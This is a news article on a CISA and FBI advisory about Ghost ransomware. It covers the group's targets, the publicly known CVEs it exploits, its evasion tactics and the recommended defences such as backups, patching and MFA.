Cybercriminals deploying Ghost ransomware have infiltrated organizations across more than 70 countries, targeting industries including healthcare, government, education, and manufacturing. The latest warning from the Cybersecurity and Infrastructure Security Agency (CISA) and the FBI highlights the relentless nature of these attacks, which exploit outdated software vulnerabilities to breach networks.
A Widespread Cyber Threat That Shows No Signs of Slowing
Security agencies say the Ghost ransomware campaign has been active since early 2021. The threat actors behind it aren’t picky—if an organization has outdated internet-facing services, it’s fair game. This has led to breaches in critical infrastructure, small and medium-sized businesses, and even organizations in China.
One troubling aspect of these attacks is how frequently the ransomware operators change their tactics. They modify file extensions, tweak ransom notes, and rotate malware executables, making it harder for investigators to track them down. Over time, this has created attribution challenges, with the group being linked to various aliases such as Cring, Crypt3r, Phantom, Strike, and Rapture.
How Ghost Ransomware Gets In
The hackers behind Ghost ransomware use a mix of publicly available exploits and custom tools to break into systems. Some of their favorite vulnerabilities involve:
- Fortinet (CVE-2018-13379): A critical flaw in Fortinet SSL VPNs, widely exploited for years.
- ColdFusion (CVE-2010-2861, CVE-2009-3960): Outdated Adobe ColdFusion servers remain prime targets.
- Microsoft Exchange (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207): Security flaws that have previously been used in state-backed cyberattacks.
Once inside, the attackers often deploy Mimikatz (a tool used for credential theft) and Cobalt Strike (a penetration testing tool turned cybercrime favorite) before executing the ransomware payload.
Ghost Ransomware’s Evolving Tactics
Ghost ransomware doesn’t follow a rigid playbook. The cybercriminals behind it continuously adapt their techniques to maximize damage and evade detection. Some notable tactics include:
- Using multiple email addresses for ransom communications to avoid easy tracking.
- Deploying ransomware through legitimate tools like Windows CertUtil to bypass security measures.
- Frequent modification of executable files to avoid signature-based antivirus detection.
Security experts say these tactics make the group particularly difficult to contain.
Ghost’s Impact on Critical Infrastructure
The most concerning aspect of these attacks is their impact on critical infrastructure. Government agencies, hospitals, and manufacturers are among those hit. In some cases, attackers have used the same vulnerabilities to breach U.S. election support systems.
Despite repeated warnings from Fortinet—dating back to 2019—many organizations have still not patched their systems, leaving them vulnerable. The consequences? Disrupted operations, stolen data, and in some cases, massive ransom demands.
How Organizations Can Protect Themselves
CISA, the FBI, and cybersecurity researchers emphasize the importance of proactive defense. Key recommendations include:
- Regular backups: Ensure backups are stored offline to prevent ransomware encryption.
- Patch vulnerabilities: Apply security updates as soon as possible, especially for known exploited flaws.
- Network segmentation: Limit lateral movement within networks to contain potential breaches.
- Multi-factor authentication (MFA): Require phishing-resistant MFA for all privileged accounts.
Security agencies have also provided specific indicators of compromise (IOCs) and detection methods to help organizations identify potential infections before significant damage occurs.
State-Backed Hackers and Election Systems Targeted
While Ghost ransomware appears to be financially motivated, state-backed hackers have exploited some of the same vulnerabilities for intelligence gathering. In particular, government-backed groups have targeted Fortinet’s SSL VPN flaw (CVE-2018-13379) for years, breaching sensitive networks, including U.S. election systems.
Given the overlap between cybercriminals and state-sponsored actors, security experts warn that leaving systems unpatched creates risks far beyond financial loss. It opens the door to espionage, infrastructure sabotage, and potential national security threats.
A Persistent and Adaptive Threat
Ghost ransomware has already caused significant damage worldwide, and there’s little indication that these attacks will stop anytime soon. As long as organizations continue to run unpatched software, attackers will have a way in.
The latest advisory from CISA, the FBI, and MS-ISAC serves as a stark reminder: businesses and government agencies must take cybersecurity seriously, or they risk becoming the next victims in an ever-growing list of high-profile breaches.
